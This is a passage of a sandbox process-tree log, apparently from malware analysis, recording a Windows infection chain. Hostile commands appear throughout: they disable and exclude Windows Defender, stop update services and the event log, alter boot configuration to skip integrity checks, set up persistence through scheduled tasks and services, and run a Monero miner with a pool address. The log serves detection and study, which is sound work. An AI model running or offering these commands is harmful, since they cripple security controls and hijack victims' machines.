4⤵
PID:2932

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
4⤵
PID:1492

C:\Users\Admin\Pictures\D09DAgIb3vlwP8fqZFaIbDY6.exe
"C:\Users\Admin\Pictures\D09DAgIb3vlwP8fqZFaIbDY6.exe"
5⤵
PID:3468

C:\Users\Admin\Pictures\D09DAgIb3vlwP8fqZFaIbDY6.exe
"C:\Users\Admin\Pictures\D09DAgIb3vlwP8fqZFaIbDY6.exe"
6⤵
PID:4032

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
7⤵
PID:3028

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
8⤵
- Modifies Windows Firewall
PID:2376

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
7⤵
PID:1212

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
8⤵
- Creates scheduled task(s)
PID:1976

C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
8⤵
PID:3868

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
8⤵
PID:4016

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
9⤵
- Modifies boot configuration data using bcdedit
PID:3640

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
9⤵
- Modifies boot configuration data using bcdedit
PID:2172

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
9⤵
- Modifies boot configuration data using bcdedit
PID:2720

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
9⤵
- Modifies boot configuration data using bcdedit
PID:3960

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
9⤵
- Modifies boot configuration data using bcdedit
PID:3908

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
9⤵
- Modifies boot configuration data using bcdedit
PID:816

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
9⤵
- Modifies boot configuration data using bcdedit
PID:3580

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
9⤵
- Modifies boot configuration data using bcdedit
PID:3640

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
9⤵
- Modifies boot configuration data using bcdedit
PID:3744

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
9⤵
- Modifies boot configuration data using bcdedit
PID:3348

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
9⤵
- Modifies boot configuration data using bcdedit
PID:2284

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
9⤵
- Modifies boot configuration data using bcdedit
PID:3968

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
9⤵
- Modifies boot configuration data using bcdedit
PID:2208

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
8⤵
PID:3808

C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
8⤵
- Modifies boot configuration data using bcdedit
PID:3764

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
8⤵
PID:4136

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
8⤵
- Creates scheduled task(s)
PID:3384

C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
8⤵
PID:4496

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
9⤵
PID:4524

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
10⤵
- Launches sc.exe
PID:4484

C:\Users\Admin\Pictures\VlerdvBv4lkjMScfwkRxUN2B.exe
"C:\Users\Admin\Pictures\VlerdvBv4lkjMScfwkRxUN2B.exe" /s
5⤵
PID:3576

C:\Users\Admin\Pictures\360TS_Setup.exe
"C:\Users\Admin\Pictures\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo=
6⤵
PID:3636

C:\Program Files (x86)\1716059550_0\360TS_Setup.exe
"C:\Program Files (x86)\1716059550_0\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall
7⤵
PID:2904

C:\Users\Admin\Pictures\Ckvjlg9dQJzS2wokmmhSLYKo.exe
"C:\Users\Admin\Pictures\Ckvjlg9dQJzS2wokmmhSLYKo.exe"
5⤵
PID:3748

C:\Users\Admin\Pictures\FUySgyHGWEviAk9TKGcJ18BD.exe
"C:\Users\Admin\Pictures\FUySgyHGWEviAk9TKGcJ18BD.exe"
5⤵
PID:3108

C:\Users\Admin\Pictures\FUySgyHGWEviAk9TKGcJ18BD.exe
"C:\Users\Admin\Pictures\FUySgyHGWEviAk9TKGcJ18BD.exe"
6⤵
PID:3284

C:\Users\Admin\Pictures\80KKw3ZTwqK5hTt1otA0w6hO.exe
"C:\Users\Admin\Pictures\80KKw3ZTwqK5hTt1otA0w6hO.exe"
5⤵
PID:3664

C:\Users\Admin\AppData\Local\Temp\7zSB358.tmp\Install.exe
.\Install.exe /tEdidDDf "385118" /S
6⤵
PID:3244

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
7⤵
PID:2656

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
8⤵
PID:1616

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
9⤵
PID:2376

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
10⤵
PID:2028

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
8⤵
PID:1928

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
9⤵
PID:2360

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
10⤵
PID:2884

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
8⤵
PID:2160

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
9⤵
PID:3156

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
10⤵
PID:3292

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
8⤵
PID:3468

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
9⤵
PID:2220

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
10⤵
PID:960

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
8⤵
PID:3528

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
9⤵
PID:3856

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
10⤵
- Command and Scripting Interpreter: PowerShell
PID:3284

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
11⤵
PID:3620

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
7⤵
PID:2724

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
8⤵
PID:2696

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
9⤵
- Command and Scripting Interpreter: PowerShell
PID:272

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
10⤵
PID:1556

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 19:12:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\YAtyGvP.exe\" it /BiTdidlhxH 385118 /S" /V1 /F
7⤵
- Creates scheduled task(s)
PID:1736

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
7⤵
PID:2216

C:\Windows\SysWOW64\cmd.exe
/C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
8⤵
PID:2648

\??\c:\windows\SysWOW64\schtasks.exe
schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
9⤵
PID:3164

C:\Users\Admin\Pictures\YleIgImsEu3zqUzoa5IEeaw0.exe
"C:\Users\Admin\Pictures\YleIgImsEu3zqUzoa5IEeaw0.exe"
5⤵
PID:3472

C:\Users\Admin\AppData\Local\Temp\7zSB886.tmp\Install.exe
.\Install.exe /tEdidDDf "385118" /S
6⤵
PID:1248

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
7⤵
PID:2240

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
8⤵
PID:2968

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
9⤵
PID:2484

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
10⤵
PID:3040

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
8⤵
PID:3712

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
9⤵
PID:3100

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
10⤵
PID:2500

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
8⤵
PID:1096

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
9⤵
PID:3896

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
10⤵
PID:1736

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
8⤵
PID:1840

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
9⤵
PID:3536

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
10⤵
PID:1580

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
8⤵
PID:700

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
9⤵
PID:3692

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
10⤵
- Command and Scripting Interpreter: PowerShell
PID:3588

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
11⤵
PID:2852

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
7⤵
PID:3252

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
8⤵
PID:452

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
9⤵
- Command and Scripting Interpreter: PowerShell
PID:3840

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
10⤵
PID:3956

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 19:12:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\JJWTBNK.exe\" it /IWddidMDLQ 385118 /S" /V1 /F
7⤵
- Creates scheduled task(s)
PID:2728

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
7⤵
PID:3276

C:\Windows\SysWOW64\cmd.exe
/C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
8⤵
PID:3412

\??\c:\windows\SysWOW64\schtasks.exe
schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
9⤵
PID:3176

C:\Users\Admin\Pictures\Z7vvl3OxGAHzRtk9lmPsK4Em.exe
"C:\Users\Admin\Pictures\Z7vvl3OxGAHzRtk9lmPsK4Em.exe"
5⤵
PID:3228

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
6⤵
- Command and Scripting Interpreter: PowerShell
PID:1000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
6⤵
PID:3684

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
7⤵
PID:1004

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
6⤵
- Launches sc.exe
PID:3164

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
6⤵
- Launches sc.exe
PID:3028

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
6⤵
- Launches sc.exe
PID:3200

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
6⤵
- Launches sc.exe
PID:3092

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
6⤵
- Launches sc.exe
PID:3636

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
6⤵
PID:3948

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
6⤵
PID:3524

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
6⤵
PID:592

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
6⤵
PID:3776

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
6⤵
- Launches sc.exe
PID:3284

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
6⤵
- Launches sc.exe
PID:272

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
6⤵
- Launches sc.exe
PID:2112

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
6⤵
- Launches sc.exe
PID:2724

C:\Users\Admin\AppData\Local\Temp\1000052001\ReurgingGleek.exe
"C:\Users\Admin\AppData\Local\Temp\1000052001\ReurgingGleek.exe"
3⤵
PID:1424

C:\ProgramData\system.exe
"C:\ProgramData\system.exe"
4⤵
PID:3168

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\system.exe'
5⤵
- Command and Scripting Interpreter: PowerShell
PID:3712

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system.exe'
5⤵
- Command and Scripting Interpreter: PowerShell
PID:3044

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\taskmgr.exe'
5⤵
- Command and Scripting Interpreter: PowerShell
PID:2992

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskmgr.exe'
5⤵
- Command and Scripting Interpreter: PowerShell
PID:3888

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "taskmgr" /tr "C:\ProgramData\taskmgr.exe"
5⤵
- Creates scheduled task(s)
PID:2748

C:\ProgramData\build.exe
"C:\ProgramData\build.exe"
4⤵
PID:3220

C:\Users\Admin\AppData\Local\Temp\1000060001\csrss.exe
"C:\Users\Admin\AppData\Local\Temp\1000060001\csrss.exe"
3⤵
PID:3384

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start "" "C:\ProgramData\HIJJEGDBFI.exe"
4⤵
PID:800

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1000060001\csrss.exe" & rd /s /q "C:\ProgramData\HJDGHIJDGCBA" & exit
4⤵
PID:4340

C:\Windows\SysWOW64\timeout.exe
timeout /t 10
5⤵
- Delays execution with timeout.exe
PID:4384

C:\Users\Admin\AppData\Local\Temp\1000061001\kdissdevoted.exe
"C:\Users\Admin\AppData\Local\Temp\1000061001\kdissdevoted.exe"
3⤵
PID:2172

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k copy Official Official.cmd & Official.cmd & exit
4⤵
PID:1784

C:\Windows\SysWOW64\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:3204

C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
5⤵
PID:3480

C:\Windows\SysWOW64\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:3540

C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
5⤵
PID:3536

C:\Windows\SysWOW64\cmd.exe
cmd /c md 31290
5⤵
PID:700

C:\Windows\SysWOW64\findstr.exe
findstr /V "OutsourcingCatchTheftUniprotkb" Pace
5⤵
PID:1564

C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Pot + Costs + Largely + Conversations 31290\R
5⤵
PID:3720

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\31290\Component.pif
31290\Component.pif 31290\R
5⤵
PID:1532

C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
5⤵
- Runs ping.exe
PID:1988

C:\Users\Admin\AppData\Local\Temp\1000062001\build13.exe
"C:\Users\Admin\AppData\Local\Temp\1000062001\build13.exe"
3⤵
PID:3140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3140 -s 72
4⤵
- Program crash
PID:3852

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
PID:1288

C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
"C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
2⤵
PID:852

C:\Windows\Temp\466072.exe
"C:\Windows\Temp\466072.exe" --list-devices
3⤵
PID:2852

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
PID:2592

C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
"C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
2⤵
PID:2816

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
PID:1996

C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
"C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
2⤵
PID:2000

C:\Windows\Temp\184286.exe
"C:\Windows\Temp\184286.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
3⤵
PID:1980

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "6998060654724135712361777511168554258-13748821392063477141508534956-318183515"
1⤵
PID:2892

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240518191123.log C:\Windows\Logs\CBS\CbsPersist_20240518191123.cab
1⤵
PID:3620

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\D411.bat" "
1⤵
PID:2596

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
2⤵
PID:3704

C:\Windows\system32\taskeng.exe
taskeng.exe {27B4E7D0-14BB-401E-81E3-5F3F3F56D071} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:3044

